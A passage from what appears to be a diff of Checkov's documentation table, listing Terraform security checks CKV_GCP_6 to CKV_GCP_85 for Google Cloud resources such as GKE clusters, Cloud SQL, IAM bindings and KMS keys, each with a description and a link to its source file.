1601 | CKV_GCP_6 | resource | google_sql_database_instance | Ensure all Cloud SQL database instance requires all incoming connections to use SSL | Terraform | [GoogleCloudSqlDatabaseRequireSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabaseRequireSsl.py) | +| 1602 | CKV_GCP_7 | resource | google_container_cluster | Ensure Legacy Authorization is set to Disabled on Kubernetes Engine Clusters | Terraform | [GKEDisableLegacyAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDisableLegacyAuth.py) | +| 1603 | CKV_GCP_8 | resource | google_container_cluster | Ensure Stackdriver Monitoring is set to Enabled on Kubernetes Engine Clusters | Terraform | [GKEMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMonitoringEnabled.py) | +| 1604 | CKV_GCP_9 | resource | google_container_node_pool | Ensure 'Automatic node repair' is enabled for Kubernetes Clusters | Terraform | [GKENodePoolAutoRepairEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoRepairEnabled.py) | +| 1605 | CKV_GCP_10 | resource | google_container_node_pool | Ensure 'Automatic node upgrade' is enabled for Kubernetes Clusters | Terraform | [GKENodePoolAutoUpgradeEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoUpgradeEnabled.py) | +| 1606 | CKV_GCP_11 | resource | google_sql_database_instance | Ensure that Cloud SQL database Instances are not open to the world | Terraform | [GoogleCloudSqlDatabasePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabasePubliclyAccessible.py) | +| 1607 | CKV_GCP_12 | resource | google_container_cluster | Ensure Network Policy is enabled on Kubernetes Engine Clusters | Terraform | [GKENetworkPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENetworkPolicyEnabled.py) | +| 1608 | CKV_GCP_13 | resource | google_container_cluster | Ensure client certificate authentication to Kubernetes Engine Clusters is disabled | Terraform | [GKEClientCertificateDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClientCertificateDisabled.py) | +| 1609 | CKV_GCP_14 | resource | google_sql_database_instance | Ensure all Cloud SQL database instance have backup configuration enabled | Terraform | [GoogleCloudSqlBackupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlBackupConfiguration.py) | +| 1610 | CKV_GCP_15 | resource | google_bigquery_dataset | Ensure that BigQuery datasets are not anonymously or publicly accessible | Terraform | [GoogleBigQueryDatasetPublicACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleBigQueryDatasetPublicACL.py) | +| 1611 | CKV_GCP_16 | resource | google_dns_managed_zone | Ensure that DNSSEC is enabled for Cloud DNS | Terraform | [GoogleCloudDNSSECEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSSECEnabled.py) | +| 1612 | CKV_GCP_17 | resource | google_dns_managed_zone | Ensure that RSASHA1 is not used for the zone-signing and key-signing keys in Cloud DNS DNSSEC | Terraform | [GoogleCloudDNSKeySpecsRSASHA1.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSKeySpecsRSASHA1.py) | +| 1613 | CKV_GCP_18 | resource | google_container_cluster | Ensure GKE Control Plane is not public | Terraform | [GKEPublicControlPlane.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPublicControlPlane.py) | +| 1614 | CKV_GCP_20 | resource | google_container_cluster | Ensure master authorized networks is set to enabled in GKE clusters | Terraform | [GKEMasterAuthorizedNetworksEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMasterAuthorizedNetworksEnabled.py) | +| 1615 | CKV_GCP_21 | resource | google_container_cluster | Ensure Kubernetes Clusters are configured with Labels | Terraform | [GKEHasLabels.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEHasLabels.py) | +| 1616 | CKV_GCP_22 | resource | google_container_node_pool | Ensure Container-Optimized OS (cos) is used for Kubernetes Engine Clusters Node image | Terraform | [GKEUseCosImage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEUseCosImage.py) | +| 1617 | CKV_GCP_23 | resource | google_container_cluster | Ensure Kubernetes Cluster is created with Alias IP ranges enabled | Terraform | [GKEAliasIpEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEAliasIpEnabled.py) | +| 1618 | CKV_GCP_24 | resource | google_container_cluster | Ensure PodSecurityPolicy controller is enabled on the Kubernetes Engine Clusters | Terraform | [GKEPodSecurityPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPodSecurityPolicyEnabled.py) | +| 1619 | CKV_GCP_25 | resource | google_container_cluster | Ensure Kubernetes Cluster is created with Private cluster enabled | Terraform | [GKEPrivateClusterConfig.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateClusterConfig.py) | +| 1620 | CKV_GCP_26 | resource | google_compute_subnetwork | Ensure that VPC Flow Logs is enabled for every subnet in a VPC Network | Terraform | [GoogleSubnetworkLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkLoggingEnabled.py) | +| 1621 | CKV_GCP_27 | resource | google_project | Ensure that the default network does not exist in a project | Terraform | [GoogleProjectDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectDefaultNetwork.py) | +| 1622 | CKV_GCP_28 | resource | google_storage_bucket_iam_binding | Ensure that Cloud Storage bucket is not anonymously or publicly accessible | Terraform | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py) | +| 1623 | CKV_GCP_28 | resource | google_storage_bucket_iam_member | Ensure that Cloud Storage bucket is not anonymously or publicly accessible | Terraform | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py) | +| 1624 | CKV_GCP_29 | resource | google_storage_bucket | Ensure that Cloud Storage buckets have uniform bucket-level access enabled | Terraform | [GoogleStorageBucketUniformAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketUniformAccess.py) | +| 1625 | CKV_GCP_30 | resource | google_compute_instance | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) | +| 1626 | CKV_GCP_30 | resource | google_compute_instance_from_template | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) | +| 1627 | CKV_GCP_30 | resource | google_compute_instance_template | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) | +| 1628 | CKV_GCP_31 | resource | google_compute_instance | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) | +| 1629 | CKV_GCP_31 | resource | google_compute_instance_from_template | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) | +| 1630 | CKV_GCP_31 | resource | google_compute_instance_template | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) | +| 1631 | CKV_GCP_32 | resource | google_compute_instance | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) | +| 1632 | CKV_GCP_32 | resource | google_compute_instance_from_template | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) | +| 1633 | CKV_GCP_32 | resource | google_compute_instance_template | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) | +| 1634 | CKV_GCP_33 | resource | google_compute_project_metadata | Ensure oslogin is enabled for a Project | Terraform | [GoogleComputeProjectOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeProjectOSLogin.py) | +| 1635 | CKV_GCP_34 | resource | google_compute_instance | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) | +| 1636 | CKV_GCP_34 | resource | google_compute_instance_from_template | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) | +| 1637 | CKV_GCP_34 | resource | google_compute_instance_template | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) | +| 1638 | CKV_GCP_35 | resource | google_compute_instance | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) | +| 1639 | CKV_GCP_35 | resource | google_compute_instance_from_template | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) | +| 1640 | CKV_GCP_35 | resource | google_compute_instance_template | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) | +| 1641 | CKV_GCP_36 | resource | google_compute_instance | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) | +| 1642 | CKV_GCP_36 | resource | google_compute_instance_from_template | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) | +| 1643 | CKV_GCP_36 | resource | google_compute_instance_template | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) | +| 1644 | CKV_GCP_37 | resource | google_compute_disk | Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [GoogleComputeDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDiskEncryption.py) | +| 1645 | CKV_GCP_38 | resource | google_compute_instance | Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [GoogleComputeBootDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBootDiskEncryption.py) | +| 1646 | CKV_GCP_39 | resource | google_compute_instance | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) | +| 1647 | CKV_GCP_39 | resource | google_compute_instance_from_template | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) | +| 1648 | CKV_GCP_39 | resource | google_compute_instance_template | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) | +| 1649 | CKV_GCP_40 | resource | google_compute_instance | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) | +| 1650 | CKV_GCP_40 | resource | google_compute_instance_from_template | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) | +| 1651 | CKV_GCP_40 | resource | google_compute_instance_template | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) | +| 1652 | CKV_GCP_41 | resource | google_project_iam_binding | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level | Terraform | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py) | +| 1653 | CKV_GCP_41 | resource | google_project_iam_member | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level | Terraform | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py) | +| 1654 | CKV_GCP_42 | resource | google_project_iam_member | Ensure that Service Account has no Admin privileges | Terraform | [GoogleProjectAdminServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectAdminServiceAccount.py) | +| 1655 | CKV_GCP_43 | resource | google_kms_crypto_key | Ensure KMS encryption keys are rotated within a period of 90 days | Terraform | [GoogleKMSRotationPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSRotationPeriod.py) | +| 1656 | CKV_GCP_44 | resource | google_folder_iam_binding | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level | Terraform | [GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py) | +| 1657 | CKV_GCP_44 | resource | google_folder_iam_member | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level | Terraform | [GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py) | +| 1658 | CKV_GCP_45 | resource | google_organization_iam_binding | Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level | Terraform | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py) | +| 1659 | CKV_GCP_45 | resource | google_organization_iam_member | Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level | Terraform | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py) | +| 1660 | CKV_GCP_46 | resource | google_project_iam_binding | Ensure Default Service account is not used at a project level | Terraform | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py) | +| 1661 | CKV_GCP_46 | resource | google_project_iam_member | Ensure Default Service account is not used at a project level | Terraform | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py) | +| 1662 | CKV_GCP_47 | resource | google_organization_iam_binding | Ensure default service account is not used at an organization level | Terraform | [GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py) | +| 1663 | CKV_GCP_47 | resource | google_organization_iam_member | Ensure default service account is not used at an organization level | Terraform | [GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py) | +| 1664 | CKV_GCP_48 | resource | google_folder_iam_binding | Ensure Default Service account is not used at a folder level | Terraform | [GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py) | +| 1665 | CKV_GCP_48 | resource | google_folder_iam_member | Ensure Default Service account is not used at a folder level | Terraform | [GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py) | +| 1666 | CKV_GCP_49 | resource | google_project_iam_binding | Ensure roles do not impersonate or manage Service Accounts used at project level | Terraform | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py) | +| 1667 | CKV_GCP_49 | resource | google_project_iam_member | Ensure roles do not impersonate or manage Service Accounts used at project level | Terraform | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py) | +| 1668 | CKV_GCP_50 | resource | google_sql_database_instance | Ensure MySQL database 'local_infile' flag is set to 'off' | Terraform | [GoogleCloudMySqlLocalInfileOff.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudMySqlLocalInfileOff.py) | +| 1669 | CKV_GCP_51 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_checkpoints' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogCheckpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogCheckpoints.py) | +| 1670 | CKV_GCP_52 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_connections' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogConnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogConnection.py) | +| 1671 | CKV_GCP_53 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_disconnections' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogDisconnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogDisconnection.py) | +| 1672 | CKV_GCP_54 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_lock_waits' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogLockWaits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogLockWaits.py) | +| 1673 | CKV_GCP_55 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_min_messages' flag is set to a valid value | Terraform | [GoogleCloudPostgreSqlLogMinMessage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinMessage.py) | +| 1674 | CKV_GCP_56 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_temp_files flag is set to '0' | Terraform | [GoogleCloudPostgreSqlLogTemp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogTemp.py) | +| 1675 | CKV_GCP_57 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_min_duration_statement' flag is set to '-1' | Terraform | [GoogleCloudPostgreSqlLogMinDuration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinDuration.py) | +| 1676 | CKV_GCP_58 | resource | google_sql_database_instance | Ensure SQL database 'cross db ownership chaining' flag is set to 'off' | Terraform | [GoogleCloudSqlServerCrossDBOwnershipChaining.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerCrossDBOwnershipChaining.py) | +| 1677 | CKV_GCP_59 | resource | google_sql_database_instance | Ensure SQL database 'contained database authentication' flag is set to 'off' | Terraform | [GoogleCloudSqlServerContainedDBAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerContainedDBAuthentication.py) | +| 1678 | CKV_GCP_60 | resource | google_sql_database_instance | Ensure Cloud SQL database does not have public IP | Terraform | [GoogleCloudSqlServerNoPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerNoPublicIP.py) | +| 1679 | CKV_GCP_61 | resource | google_container_cluster | Enable VPC Flow Logs and Intranode Visibility | Terraform | [GKEEnableVPCFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableVPCFlowLogs.py) | +| 1680 | CKV_GCP_62 | resource | google_storage_bucket | Bucket should log access | Terraform | [CloudStorageLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageLogging.py) | +| 1681 | CKV_GCP_63 | resource | google_storage_bucket | Bucket should not log to itself | Terraform | [CloudStorageSelfLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageSelfLogging.py) | +| 1682 | CKV_GCP_64 | resource | google_container_cluster | Ensure clusters are created with Private Nodes | Terraform | [GKEPrivateNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateNodes.py) | +| 1683 | CKV_GCP_65 | resource | google_container_cluster | Manage Kubernetes RBAC users with Google Groups for GKE | Terraform | [GKEKubernetesRBACGoogleGroups.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEKubernetesRBACGoogleGroups.py) | +| 1684 | CKV_GCP_66 | resource | google_container_cluster | Ensure use of Binary Authorization | Terraform | [GKEBinaryAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEBinaryAuthorization.py) | +| 1685 | CKV_GCP_68 | resource | google_container_cluster | Ensure Secure Boot for Shielded GKE Nodes is Enabled | Terraform | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py) | +| 1686 | CKV_GCP_68 | resource | google_container_node_pool | Ensure Secure Boot for Shielded GKE Nodes is Enabled | Terraform | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py) | +| 1687 | CKV_GCP_69 | resource | google_container_cluster | Ensure the GKE Metadata Server is Enabled | Terraform | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py) | +| 1688 | CKV_GCP_69 | resource | google_container_node_pool | Ensure the GKE Metadata Server is Enabled | Terraform | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py) | +| 1689 | CKV_GCP_70 | resource | google_container_cluster | Ensure the GKE Release Channel is set | Terraform | [GKEReleaseChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEReleaseChannel.py) | +| 1690 | CKV_GCP_71 | resource | google_container_cluster | Ensure Shielded GKE Nodes are Enabled | Terraform | [GKEEnableShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableShieldedNodes.py) | +| 1691 | CKV_GCP_72 | resource | google_container_cluster | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled | Terraform | [GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py) | +| 1692 | CKV_GCP_72 | resource | google_container_node_pool | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled | Terraform | [GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py) | +| 1693 | CKV_GCP_73 | resource | google_compute_security_policy | Ensure Cloud Armor prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [CloudArmorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudArmorWAFACLCVE202144228.py) | +| 1694 | CKV_GCP_74 | resource | google_compute_subnetwork | Ensure that private_ip_google_access is enabled for Subnet | Terraform | [GoogleSubnetworkPrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkPrivateGoogleEnabled.py) | +| 1695 | CKV_GCP_75 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted FTP access | Terraform | [GoogleComputeFirewallUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress21.py) | +| 1696 | CKV_GCP_76 | resource | google_compute_subnetwork | Ensure that Private google access is enabled for IPV6 | Terraform | [GoogleSubnetworkIPV6PrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkIPV6PrivateGoogleEnabled.py) | +| 1697 | CKV_GCP_77 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow on ftp port | Terraform | [GoogleComputeFirewallUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress20.py) | +| 1698 | CKV_GCP_78 | resource | google_storage_bucket | Ensure Cloud storage has versioning enabled | Terraform | [CloudStorageVersioningEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageVersioningEnabled.py) | +| 1699 | CKV_GCP_79 | resource | google_sql_database_instance | Ensure SQL database is using latest Major version | Terraform | [CloudSqlMajorVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudSqlMajorVersion.py) | +| 1700 | CKV_GCP_80 | resource | google_bigquery_table | Ensure Big Query Tables are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigQueryTableEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableEncryptedWithCMK.py) | +| 1701 | CKV_GCP_81 | resource | google_bigquery_dataset | Ensure Big Query Datasets are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigQueryDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryDatasetEncryptedWithCMK.py) | +| 1702 | CKV_GCP_82 | resource | google_kms_crypto_key | Ensure KMS keys are protected from deletion | Terraform | [GoogleKMSPreventDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSPreventDestroy.py) | +| 1703 | CKV_GCP_83 | resource | google_pubsub_topic | Ensure PubSub Topics are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [CloudPubSubEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudPubSubEncryptedWithCMK.py) | +| 1704 | CKV_GCP_84 | resource | google_artifact_registry_repository | Ensure Artifact Registry Repositories are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [ArtifactRegsitryEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegsitryEncryptedWithCMK.py) | +| 1705 | CKV_GCP_85 | resource | 